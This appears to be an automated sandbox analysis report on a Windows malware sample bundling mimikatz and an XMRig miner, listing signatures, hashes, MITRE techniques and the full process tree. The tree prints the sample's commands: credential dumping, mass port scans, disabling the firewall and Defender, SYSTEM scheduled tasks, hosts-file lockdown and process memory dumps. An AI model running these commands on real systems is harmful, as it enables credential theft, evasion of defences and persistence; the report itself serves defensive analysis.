Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
10/05/2024, 07:46
General
-
Target
2024-05-10_40e363ec519f3052f5fda3b9c6f75398_hacktools_icedid_mimikatz.exe
-
Size
7.4MB
-
MD5
40e363ec519f3052f5fda3b9c6f75398
-
SHA1
fed7c6ff9692a073d2c2233589ca2ef55f598604
-
SHA256
3c119b572a9975d1178ba21dea961ebeb0554f5ea6eacc5b6acca6d51a0d8359
-
SHA512
9f5bd87742258e803002e4e7dba225489227afb7fb3a2ff3613ec229452fdb0d8e2d8d9090a158ce9f82b5d46b7a69bb55e560f17cf53bce35e226df40d9ad28
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (29319) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 41 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\jutytzbiz\vlznhs.exe"C:\Windows\TEMP\jutytzbiz\vlznhs.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-10_40e363ec519f3052f5fda3b9c6f75398_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-10_40e363ec519f3052f5fda3b9c6f75398_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bezcgpgz\tvfgbtg.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\bezcgpgz\tvfgbtg.exeC:\Windows\bezcgpgz\tvfgbtg.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\bezcgpgz\tvfgbtg.exeC:\Windows\bezcgpgz\tvfgbtg.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtqmrgzll\mbplvzhfy\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\mtqmrgzll\mbplvzhfy\wpcap.exeC:\Windows\mtqmrgzll\mbplvzhfy\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtqmrgzll\mbplvzhfy\lebvttigv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtqmrgzll\mbplvzhfy\Scant.txt2⤵
-
C:\Windows\mtqmrgzll\mbplvzhfy\lebvttigv.exeC:\Windows\mtqmrgzll\mbplvzhfy\lebvttigv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtqmrgzll\mbplvzhfy\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtqmrgzll\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mtqmrgzll\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\mtqmrgzll\Corporate\vfshost.exeC:\Windows\mtqmrgzll\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ithblmbub" /ru system /tr "cmd /c C:\Windows\ime\tvfgbtg.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ithblmbub" /ru system /tr "cmd /c C:\Windows\ime\tvfgbtg.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mefgzzchv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bezcgpgz\tvfgbtg.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mefgzzchv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bezcgpgz\tvfgbtg.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ziqnhgpmv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jutytzbiz\vlznhs.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ziqnhgpmv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jutytzbiz\vlznhs.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 812 C:\Windows\TEMP\mtqmrgzll\812.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 376 C:\Windows\TEMP\mtqmrgzll\376.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 2132 C:\Windows\TEMP\mtqmrgzll\2132.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 2692 C:\Windows\TEMP\mtqmrgzll\2692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 2928 C:\Windows\TEMP\mtqmrgzll\2928.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 2948 C:\Windows\TEMP\mtqmrgzll\2948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 3088 C:\Windows\TEMP\mtqmrgzll\3088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 3820 C:\Windows\TEMP\mtqmrgzll\3820.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 3936 C:\Windows\TEMP\mtqmrgzll\3936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 4004 C:\Windows\TEMP\mtqmrgzll\4004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 3724 C:\Windows\TEMP\mtqmrgzll\3724.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 2640 C:\Windows\TEMP\mtqmrgzll\2640.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 4892 C:\Windows\TEMP\mtqmrgzll\4892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 1940 C:\Windows\TEMP\mtqmrgzll\1940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 1676 C:\Windows\TEMP\mtqmrgzll\1676.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 1480 C:\Windows\TEMP\mtqmrgzll\1480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 1128 C:\Windows\TEMP\mtqmrgzll\1128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exeC:\Windows\TEMP\mtqmrgzll\tbcpiiqug.exe -accepteula -mp 1300 C:\Windows\TEMP\mtqmrgzll\1300.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\mtqmrgzll\mbplvzhfy\scan.bat2⤵
-
C:\Windows\mtqmrgzll\mbplvzhfy\vysezpigj.exevysezpigj.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\vanpws.exeC:\Windows\SysWOW64\vanpws.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tvfgbtg.exe1⤵
-
C:\Windows\ime\tvfgbtg.exeC:\Windows\ime\tvfgbtg.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jutytzbiz\vlznhs.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\jutytzbiz\vlznhs.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bezcgpgz\tvfgbtg.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bezcgpgz\tvfgbtg.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tvfgbtg.exe1⤵
-
C:\Windows\ime\tvfgbtg.exeC:\Windows\ime\tvfgbtg.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jutytzbiz\vlznhs.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\jutytzbiz\vlznhs.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bezcgpgz\tvfgbtg.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bezcgpgz\tvfgbtg.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
2.7MB
MD5bd888e5fbc8dc0cf680ba22b59ba5882
SHA163b5e020318e4f8b985c837882635f8977d078e8
SHA256820c3eb3d4f2ba9bda1c63822a40c58ab8a412a23dade74d19424395a80c4650
SHA5128256bb25a87b7f18f88c05d64d2c6f04989656486c166700647e29f1cd71788fc3541eb90fbd37b8632588d32e1f352913bd97b7c5a95eda2d35f41df254d734
-
Filesize
8.7MB
MD536ca45a81fceb7ea75299eeb449155bb
SHA1f505f73c1177852497112bf3586ba49ce5423818
SHA2560f2cdacfbef333e7da4591a35af59deed83f29613ffef71e526221f896f6f0e0
SHA5128cd43d2f7b31e36d2f4f2a685490fde8272093e356f7c778171f2ccec1ad0c6fc4752dd22b95ae63281efa6481847d40927ab1063bd09d0a5b642c65dedc1521
-
Filesize
4.2MB
MD550808307307cababa10ad30c0750acf6
SHA12303a773c9ba719837b91a6bfc28b8a5e98e0466
SHA256dfd06c573d92de0326061edc390402ae3f9630d6ada0e47ca9a3d4284370a219
SHA51291a273400f49cea729f0648ab8c66ba83a5f5bb2d588f9c455211c980990c68b441fd3017b7ff6fbcd973a63f39dcc16619b2a72ac7c5b026e16e9f001def1e8
-
Filesize
26.0MB
MD55416e4fe58143ed7c958d2af6217eafd
SHA11c78d8acc24781fe5caa22ee26f3f93ae58c4496
SHA256fc2ff0108c974644c789f3706eb648bd2b6a9dd17dda7159a92d2295515799cf
SHA512ba5171cb01e556ce8f978b38714ebdc61c20e5bb6a113097066a9862f57fb49759e0d814853e0c53ecc5cfe03ff4d3dae7b6658b5bd7a6461b79fdf9cb33493e
-
Filesize
7.4MB
MD52af42ef4872fb252dc0e0ea4dff03202
SHA1ba3554bb2188341eeea998c45dd33331c69c59dd
SHA25650ec9b475aa856529c7885951fbd9adc3750788cb316cd7ac1573696149771b0
SHA5122a7940698ac881b7a1859bba4da4b950398ecb6bccfcf08b1299fc67615ccef4c231195142081c911c0e2d7b2c6625c3e49a3d46ecae3a0135a65b6add2a04d9
-
Filesize
814KB
MD5b6269e498ce1865033aee3d96ee37b7e
SHA119d97ce3c4f23164a6af25a517126381af1eba13
SHA256bbc2b2efa4f4d7477714cddaf82180266686dfd1d72f759ed29af56b8cdfbaeb
SHA5129eb497c417065869e50d2b1333346087992324c6aa646114e13f52c60c4b7503f40496a268bada8900c007c5b0d6fab0b57e89d114b12bbf36199812517a4612
-
Filesize
4.0MB
MD50399ff907f716885bbc3554e9c261f03
SHA1623d08f04c45bb7a081ecfe7cabbf0f15a950303
SHA256ff313400b86fa192aa10cacc4eca6f66d9686aeef43ce844d7bb42a3b94c04dd
SHA5124f48b8b3707880fbdb2044acd77fb6ffa389b8668842b8a67b8b9deaffa853999b50046b7b35a5a336ca1225ff3f223b5d2607eb6e148e9d120ff9ecfc7a3349
-
Filesize
2.9MB
MD5f701ae19be8d7f3494cf687948b4d989
SHA1b16114d80d8b898f344bad584aa964e3e983abfb
SHA256b0f2b3c13e669231b70432caee2661bb9bfd77060ba3047f15bb0eb0d85fbc59
SHA5121d2f555a5824b4d47f24c9549d1f26b3637601f019372bf420dc52ee677fe0bfbece23f744f43a8d3885413cbf0bf5cce6b40e004e9becd34e80a2c7ed8d50f4
-
Filesize
45.6MB
MD56c37f9582e586293d2635d5e00b93156
SHA15e9706fbc73b3f070e19e79a3dc0d6296c4fca59
SHA256105b44bae6317461ce6111d9029db79416dae35ca0fdb9d5347a4a7b127502d1
SHA512b24f205166b95c7e939cab2638908de912e38538e5e10a36b727d042756210901dd1a4e6bebc948544b1ffaddd4b01e1fb084a07bfa511d2e0db5eb07269c1a9
-
Filesize
33.4MB
MD545075572133063d2eb7e8b456710620d
SHA1083319644842da88513ef6d51dd822596cc17622
SHA2568e4118b8ae8faa1c1537344d544a4c6a010ef471e2910011606a12e121de5b62
SHA512e983a2c5e192f7f9ece3e7f01980b8c0de1651b1633e8cd700b93faa1bf456cc6724cc1a99874d0ab6453c063321cc37f89ba074257b1529e9bf920b4c93763d
-
Filesize
2.8MB
MD5c496012a275196987f427a3ce1ab0f84
SHA182dd7dd1a290f186457eef53d997f4276629e5aa
SHA2567d85bf0ee0f6db1ef29e20d860108cffd0b302c50faf4c065802cd4dae2d06d0
SHA512155c30e30b853c79e3b0adab95936dad900e8ffcc248b2b463eab2cc03f10469c27e7be0404ae19e51bf6ad7c18562c4214c7f580fc52918c2d146e89d564dd1
-
Filesize
20.9MB
